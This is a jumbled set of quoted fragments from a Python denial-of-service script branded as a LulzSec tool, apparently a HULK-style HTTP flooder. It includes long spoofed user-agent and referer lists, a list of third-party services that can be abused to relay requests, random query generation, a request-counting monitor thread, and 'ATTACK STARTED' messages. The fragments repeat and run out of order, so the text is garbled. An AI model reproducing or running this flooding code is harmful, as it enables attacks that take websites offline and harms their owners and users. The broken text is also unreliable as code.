OS X; http://www.scifihifi.com/cocoalicious)')", "Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0", "(KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)", "print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" .", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex')", "NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS", "Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search", "(Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx", "http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0: if", "if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\"", "(aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324')", "headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", ",'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\", "Balihoo.com search engine - obeys robots.txt and robots meta tags ; http://balihoo.com/index.aspx; robot", "Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia", "if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2:", "keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64)", "def run(self): previous=request_counter while flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\"", "headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P", "headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X;", "\\ `--. ) /|-._: : | \\ \\ / / :_| ;`-._; __..--';", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')", "MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0", "Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1;", "libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus", "(previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ", "Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0", "headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Galaxy Nexus", "en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE", "(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;", "headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;')", "Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)')", "3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible;", "GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1;", "http://balihoo.com/index.aspx; robot at balihoo dot com)') headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev')", "MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0", "(Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4", "(+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent')", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML,", "alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') headers_useragents.append('AnswerBus (http://www.answerbus.com/)') headers_useragents.append('AnswerChase", "4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android", "headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel') headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X", "print \"%d lULZ Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\"", "headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1') headers_useragents.append('Mozilla/4.0 (compatible;", "headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)')", "acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher", "Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC", "com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon", "3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR", "Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)')", "(Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v 1.0')", "headers_useragents.append('W3C_Validator/1.432.2.19') headers_useragents.append('W3C_Validator/1.432.2.10') headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0')", "Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple", "headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0') headers_useragents.append('amaya/9.55 libwww/5.4.0') headers_useragents.append('amaya/9.54 libwww/5.4.0') headers_useragents.append('amaya/9.52 libwww/5.4.0') headers_useragents.append('amaya/9.51 libwww/5.4.0') headers_useragents.append('amaya/8.8.5", "(Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider')", "Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0') headers_useragents.append('", "'[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter()", "len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2: url = url", "(Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5')", "flag==0: if (previous+500<request_counter) & (previous<>request_counter): print \"%d lULZ Up\" % (request_counter) previous=request_counter if", ": O ._O O_. O ._O O_. ; ; : `. // //", "| : : :: ,. . ,' :: /`-._| | | || '", "U; Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654')", "(Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0", "(aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324')", "<EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)')", "import sys import threading import random import re #global params url='' host='' headers_useragents=[]", "._O O_. O ._O O_. ; ; : `. // // // //", "/ / / / / / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\"", "Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/| \\ /-./_ \\; \\", "string def buildblock(size): out_str = '' for i in range(0, size): a =", "headers_useragents.append('Advanced Browser (http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML,", "list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si", "nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x')", "like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE", "bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\")", "set_flag(val): global flag flag=val def set_safe(): global safe safe=1 # generates a user", "Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx", "headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0)", "~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0:", "like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0", "http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered", "(Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')", "2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')", "Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like", "keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1;", "NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good", "Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')", "| | `| : `' ,' `. / |`-:_ ; | | |", "Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT", "Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/)", "MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC;", "headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx')", "('http://' + host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\")", "`. / |`-:_ ; | | | : \\ `--. ) /|-._: :", "Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0", "Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird')", "Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2;", "def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=')", "headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp", "Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824", "Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0", "a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/|", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "\\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,' \\", "U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile", "for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str)", "4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0", "_// ~ ~ / / / / / / / / ~ ~~", "; ; : `. // // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~", "NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1;", "MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2;", "Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')", "url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*',", "SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0')", "3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1;", "librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3')", "range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print", "bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\")", "Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like", "(Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux;", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like", "IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR", "OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3;", "da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |:", "U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840", "bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") 